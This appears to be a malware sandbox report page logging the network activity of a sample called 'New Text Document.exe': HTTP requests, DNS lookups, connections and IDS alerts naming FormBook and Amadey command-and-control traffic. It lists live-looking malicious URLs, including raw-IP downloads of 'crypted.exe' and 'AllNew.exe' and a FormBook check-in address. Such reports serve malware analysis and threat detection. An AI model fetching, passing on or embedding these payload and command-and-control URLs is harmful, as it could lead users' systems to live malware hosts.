6668powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_433ntkp1.gxu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
155
TCP/UDP connections
171
DNS requests
85
Threats
200

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6164
New Text Document.exe
GET
404
116.50.37.244:80
http://www.goldenjade-travel.com/fo8o/?2l9r=TMukY&sfxllR=LFKqyrcu7g1NCa8cXny9gtk027ocrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxiEru3ksjNY5cai8E58HJHg1JsGALGnrnNilzuiykt9f7fo7GP8=
unknown
malicious
6164
New Text Document.exe
POST
404
116.50.37.244:80
http://www.goldenjade-travel.com/fo8o/
unknown
malicious
6164
New Text Document.exe
POST
404
116.50.37.244:80
http://www.goldenjade-travel.com/fo8o/
unknown
malicious
6164
New Text Document.exe
GET
200
31.41.244.11:80
http://31.41.244.11/files/crypted.exe
unknown
malicious
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6944
svchost.exe
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6944
svchost.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5488
MoUsoCoreWorker.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6164
New Text Document.exe
GET
200
185.215.113.36:80
http://185.215.113.36/AllNew.exe
unknown
unknown
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
2.16.110.136:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
6944
svchost.exe
23.48.23.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.48.23.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6944
svchost.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5488
MoUsoCoreWorker.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4020
svchost.exe
239.255.255.250:1900
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
  • 4.231.128.59
whitelisted
www.bing.com
  • 2.16.110.136
  • 2.16.110.153
  • 2.16.110.152
  • 2.16.110.139
  • 2.16.110.144
  • 2.16.110.138
  • 2.16.110.154
  • 2.16.110.147
  • 2.16.110.145
whitelisted
google.com
  • 142.250.184.206
  • 172.217.169.110
whitelisted
crl.microsoft.com
  • 23.48.23.176
  • 23.48.23.147
  • 23.48.23.166
  • 23.48.23.164
  • 23.48.23.156
  • 23.48.23.177
  • 2.16.164.49
  • 2.16.164.9
whitelisted
www.microsoft.com
  • 23.52.120.96
  • 69.192.161.161
whitelisted
urlhaus.abuse.ch
  • 151.101.194.49
  • 151.101.130.49
  • 151.101.66.49
  • 151.101.2.49
whitelisted
armanayegh.com
  • 185.94.96.102
malicious
cheatkeys.com
  • 75.2.60.5
  • 99.83.231.61
unknown
www.3xfootball.com
  • 154.215.72.110
malicious
www.kasegitai.tokyo
unknown

Threats

PID
Process
Class
Message
6164
New Text Document.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
6164
New Text Document.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
6164
New Text Document.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
6164
New Text Document.exe
A Network Trojan was detected
ET MALWARE Possible MalDoc Payload Download Nov 11 2014
6164
New Text Document.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
6164
New Text Document.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
6164
New Text Document.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
6164
New Text Document.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
6720
Gxtuum.exe
Malware Command and Control Activity Detected
BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s)
6164
New Text Document.exe
Malware Command and Control Activity Detected
ET MALWARE FormBook CnC Checkin (GET) M5
14 ETPRO signatures available at the full report
Process
Message
MSBuild.exe
CLR: Managed code called FailFast without specifying a reason.